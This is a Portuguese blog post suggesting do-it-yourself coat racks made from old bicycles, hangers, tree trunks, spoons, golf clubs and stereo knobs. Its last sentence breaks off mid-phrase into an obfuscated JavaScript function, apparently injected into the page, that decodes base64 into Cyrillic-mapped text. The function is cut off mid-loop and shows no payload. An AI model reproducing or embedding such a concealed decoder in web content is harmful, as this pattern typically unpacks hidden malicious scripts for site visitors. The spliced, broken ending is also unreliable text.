Bengaleiros que fazem toda a diferença
Reciclar é sempre uma boa ideia! Pegar em objectos que já não usamos e dar-lhes uma nova vida, em vez de nos desfazermos deles. Também podemos juntar este e aquele elemento e ganhar um novo objecto completamente diferente e bem mais útil.
Os bengaleiros são peças de apoio que dão um jeitinho extra no que toca à arrumação de nossa casa e há inúmeras formas de fazermos o nosso próprio e maravilhoso bengaleiro praticamente sem custos. Ficou curioso? Ora veja!
Bengaleiros originais
Há objectos pelos quais temos uma estima especial e custa-nos muito desfazermo-nos deles, por exemplo uma bicicleta que foi nossa confidente em longos passeios. Se a sua bicicleta está guardada a ganhar pó e ferrugem, homenageie a sua companheira de viagens. Transforme-a num lindo e muito prático bengaleiro. Só tem que retirar o interior do pneu e adicionar um pé alto.
Alguma vez tinha imaginado ser possível fazer um bengaleiro desta forma? É tão prático e fácil de fazer! Só tem que dividir os seus cabides ao meio e pregá-los numa tábua de madeira bonita. Depois pode pendurar a sua roupa e acessórios como sacos, chapéus, malas, casacos… Mãos à obra, o seu já hoje!
Se quer um toque rústico na sua casa, nada melhor que usar um tronco de árvore a fazer de bengaleiro. Só precisa de o prender numa base, por exemplo em madeira pintada e já está. Apare os ramos cortados, que vão fazer de cabides. É um apontamento decorativo lindo e muito útil.
Que lindo este bengaleiro que dá uma nova vida às colheres que deixámos de usar. Pode pendurar aventais se o colocar na cozinha ou, por exemplo, usá-lo como chapeleira no corredor de sua casa.
Há objectos que herdamos e que muitas vezes guardamos em algum sítio sem fazer justiça à sua beleza. Beleza essa que acaba por ficar escondida dos olhos de todos. Esta é uma excelente forma de expor alguns dos objetos que ganhou dos seus entes queridos. Por exemplo, um conjunto de tacos de golfe antigos que fazem o cabide perfeito para o seu hall de entrada...
Ou mesmo aquela serra antiga, com que os avós, lá na aldeia, cortavam a madeira.
Outra ideia fantástica é usar alguns troncos de árvores cortados como bengaleiro. Junte quatro tábuas de madeira para formar uma moldura e encaixe os troncos lá dentro. Deixe as pontas salientes para fora, para servirem de suporte, por exemplo, para os seus lenços e cachecóis.
Também na casa de banho um bengaleiro pode ser muito útil, como suporte para toalhas. Já viu estes com puxadores de porta antigos? Útil, lindo e original!
E por falar em originalidade, há poucas coisas mais originais do que usar um painel de botões de uma antiga aparelhagem para pendurar as suas coisas! Então se for amante de música, já viu como ganha um objecto tão simbólico em sua casa? Eu adoro, e você?
Se gostou destes bengaleiros super originais, tenho mais ideias de decoração a mostrar-lhe: conheça melhor function a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<<2)|(w9>>4);w6=((w9&15)<<4)|(we>>2);qe=((we&3)<<6)|n7;if(n6>=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa